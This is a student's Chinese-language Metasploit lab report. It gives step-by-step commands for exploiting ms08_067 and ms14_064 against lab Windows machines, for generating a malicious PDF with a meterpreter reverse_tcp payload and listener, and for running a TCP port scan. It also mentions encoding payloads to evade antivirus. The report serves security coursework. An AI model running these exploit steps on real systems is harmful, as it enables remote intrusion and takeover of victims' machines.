Exp5 MSF基础应用 Week7 - 20165201

时间：2019-04-21 20:44:08 阅读：195 评论：0 收藏：0 [点我收藏+]

#Exp5 MSF基础应用 Week7 - 20165201

（由于图片比较大，看的时候需要关闭侧边栏~）

本实践目标是掌握metasploit的基本应用方式，重点常用的三种攻击方式的思路。具体需要完成：

1.1一个主动攻击实践，如ms08_067; （1分）

1.2 一个针对浏览器的攻击，如ms11_050；（1分）

1.3 一个针对客户端的攻击，如Adobe；（1分）

1.4 成功应用任何一个辅助模块。（0.5分）

以上四个小实践可不限于以上示例，并要求至少有一个是和其他所有同学不一样的，否则扣除0.5分

exploit：就是利用漏洞，通过后门程序或者恶意代码来攻击漏洞
payload：有效载荷，payload和load的区别就是，load是载荷，也就是一个恶意程序，可能表面上伪装成有什么正常的功能；而payload是有效载荷，也就是载荷中有效的那部分，最关键的部分，可以说是恶意程序中起决定性作用的那段代码，比如之前的shellcode
encode：编码或者说是加密，其实加密的本质就是对信息进行编码，主要为了免杀，通过对恶意代码进行编码，使杀软无法利用特征码检测出来

漏洞描述：ms08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”，如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码，可用于进行蠕虫攻击。受影响的系统有 Microsoft Windows 2000、Windows XP 和 Windows Server 2003
我把Windows2000 专业版作为靶机
首先在Kali中输入msfconsole进入控制台界面

今天的图好看哈哈哈！！！
use exploit/windows/smb/ms08_067_netapi选择漏洞
show payloads显示可用的有效载荷
set payload generic/shell_reverse_tcp选择有效载荷为tcp反弹连接来获取shell
set LHOST 192.168.109.163设置攻击机的IP
set LPORT 5201设置攻击机端口
set RHOSTS 192.168.109.170设置靶机IP
set target 0自动选择目标系统类型
show options一定要检查一下配置有没有问题！
exploit开始攻击

成功了！！

漏洞描述：This module exploits the Windows OLE Automation array vulnerability,CVE-2014-6332. The vulnerability is known to affect InternetExplorer 3.0 until version 11 within Windows 95 up to Windows 10,
and no patch for Windows XP. However, this exploit will only target Windows XP and Windows 7 box due to the Powershell limitation.Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other newer Windows systems, the exploit will try using Powershell instead.
我把 Windows XP 作为靶机
IE浏览器的版本是
先输入search ms14_064来查找这个漏洞
use exploit/windows/browser/ms14_064_ole_code_execution选择漏洞
info查看具体信息
show payloads查看可以用的有效载荷
set payload windows/meterpreter/reverse_tcp选择有效载荷
set LHOST 192.168.109.163设置攻击机的IP
set LPORT 5201设置攻击机端口
set URIPATH lzh设置url域名
show options一定要检查一下配置有没有问题！
set ALLOWPOWERSHELLPROMPT true上图的那个选项要设置为true
exploit开始攻击，在Windows XP的IE浏览器中输入http://192.168.109.163:8080/lzh
sessions -i 1查看开启的会话

攻击成功！

漏洞描述：This module embeds a Metasploit payload into an existing PDF file.
The resulting PDF can be sent to a target as part of a social
engineering attack.
use exploit/windows/fileformat/adobe_pdf_embedded_exe选择漏洞
info查看具体信息
show payloads查看可以用的有效载荷
set payload windows/meterpreter/reverse_tcp选择有效载荷
show options查看需要我们设置什么
set LHOST 192.168.109.163设置攻击机的IP
set LPORT 5201设置攻击机端口
set RHOSTS 192.168.109.171设置靶机IP
set FILENAME 20165201.pdf
show options一定要检查一下配置有没有问题！
exploit开始！成功生成pdf文件：20165201.pdf
然后把这个pdf放进XP里
在Kali中进行监听：
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp选择有效载荷
- set LHOST 192.168.109.163设置攻击机的IP
- set LPORT 5201设置攻击机端口
- exploit开始！
- 在XP打开PDF
  
  成功！

输入show auxiliary用这个命令来查看所有的辅助模块
我选择了scanner/portscan/tcp
输入info来查看这个模块的信息
模块描述： Enumerate open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.通过在每个端口上执行完整的TCP连接来枚举打开的TCP服务。这不需要目标计算机上的管理权限。也就是说可以扫描开放的TCP端口
可以看到需要我们输入目标主机的IP地址
set LHOST 192.168.109.171设置目标主机的IP
set threads 10我把线程数设为了10个
扫描端口的范围用默认的就好
run开始扫描！

扫描成功！！